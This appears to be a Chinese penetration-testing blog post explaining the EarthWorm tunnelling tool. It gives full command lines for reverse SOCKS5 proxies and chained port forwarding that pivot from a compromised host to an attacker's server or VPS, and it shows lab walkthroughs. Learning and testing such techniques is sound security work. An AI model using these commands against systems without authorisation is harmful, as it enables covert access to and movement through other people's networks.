0x00 前言
當你在內網滲透,並且拿下一臺機器的權限時,你是不是覺得已經算是一次完整的滲透了?
不來一次內網漫遊,滲透是不完整的,哈哈。
本文給大家推薦一款內網穿透神器EarthWorm,(簡稱EW)是一套輕量便攜且功能強大的網絡穿透工具,基於標準C開發,具有socks5代理、端口轉發和端口映射三大功能。
它強在哪些方面呢?
1.可穿透複雜的內網環境。(這麼說吧:我本地連著路由器開一個虛擬機,可以直接反彈到公網的雲服務器上。)
2.以支持多平臺間的轉接通訊,Linux、Windows、MacOS、Arm-Linux均支持。
支持平臺列表:(可跨平臺反彈)
ew_for_Win.exe 適用各種Windows系統(X86指令集、X64指令集) Windows7、Windows XPew_for_Linux32 各常見Linux發行版 (X86 指令集 CPU) Ubuntu(X86)/BT5(X86)ew_for_linux64 各常見Linux發行版 (X64 指令集 CPU) Ubuntu(X64)/Kali(X64)ew_for_MacOSX64 MacOS系統發行版 (X64 指令集) 蘋果PC電腦,蘋果serverew_for_Arm32 常見Arm-Linux系統 HTC New One(Arm-Android)/小米路由器(R1D)ew_mipsel 常見Mips-Linux系統 (Mipsel指令集 CPU) 螢石硬盤錄像機、小米mini路由器(R1CM)
0x01 使用方法
以下所有樣例,如無特殊說明代理端口均為1080,服務均為SOCKSv5代理服務.
該工具共有 6 種命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。
1.正向SOCKS v5服務器
$ ./ew -s ssocksd -l 1080
2. 反彈 SOCKS v5 服務器
這個操作具體分兩步:
a) 先在一臺具有公網 ip 的主機A上運行以下命令:
$ ./ew -s rcsocks -l 1080 -e 8888
b) 在目標主機B上啟動 SOCKS v5 服務 並反彈到公網主機的 8888端口
$ ./ew -s rssocks -d 1.1.1.1 -e 8888
成功。
3. 多級級聯
工具中自帶的三條端口轉發指令,它們的參數格式分別為:
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
通過這些端口轉發指令可以將處於網絡深層的基於TCP的服務轉發至根前,比如 SOCKS v5。
首先提供兩個“二級級聯”本地SOCKS測試樣例:
a) lcx_tran 的用法
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
b) lcx_listen、lcx_slave 的用法
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
再提供一個“三級級聯”的本地SOCKS測試用例以供參考
$ ./ew -s rcsocks -l 1080 -e 8888
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
$ ./ew -s lcx_listen -l 9999 -e 7777
$ ./ew -s rssocks -d 127.0.0.1 -e 7777
數據流向: SOCKS v5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks
0x02 實戰測試(分為本地測試和公網IP測試)
一般最常用的就是上面的第二條:反彈 SOCKS v5 服務器。
使用實例1:
目標機器:
ew.exe -s rssocks -d 2.2.2.2 -e 888
(2.2.2.2為想要反彈到的機器)
攻擊機器:
ew.exe -s rcsocks -l 1008 -e 888
(監聽888端口,轉發到1008端口)
測試環境:
在這裡我直接用我的本機Win10作為目標機器,將虛擬機Win7作為攻擊機器。
本機Win10 ip:192.168.62.1Win7 ip:192.168.62.128
首先攻擊機器win7運行命令:
ew_for_Win.exe -s rcsocks -l 1008 -e 888
接收888端口的數據並轉發到1008端口。
此時正在監聽。
目標機器Win10運行命令:
ew_for_Win.exe -s rssocks -d 192.168.62.128 -e 888
此時攻擊機器會彈出連接成功的提示:
好了,到此Win10的SOCKS5代理就反彈到Win7攻擊機上了。
只需要一個Socks5連接工具就可以連接到本地1008端口來代理訪問了。
推薦工具SocksCap64。
在代理處配置127.0.0.1:1008
代理已連接。
使用實例2:
攻擊者洛杉磯 Linux VPS :45.78.*.*
目標阿里雲服務器 Win2008:47.93.*.*
攻擊者Linux監聽:
[root@centos6 ~]# ./ew_for_Linux32 -s rcsocks -l 1008 -e 888
目標阿里雲服務器反彈:
ew_for_Win.exe -s rssocks -d 45.78.*.* -e 888
攻擊機器監聽出現:rssocks cmd_socket OK!
表示反彈成功。
0x03 工具下載
分別是EarthWorm和SocksCap64。(私信我獲取)
如果你也對網絡安全感興趣,或者致力於成為一名白帽子,或者僅僅想吃瓜看調戲黑闊和騙子的日常,也請關注我,不會讓你們失望~
閱讀更多 i春秋論壇 的文章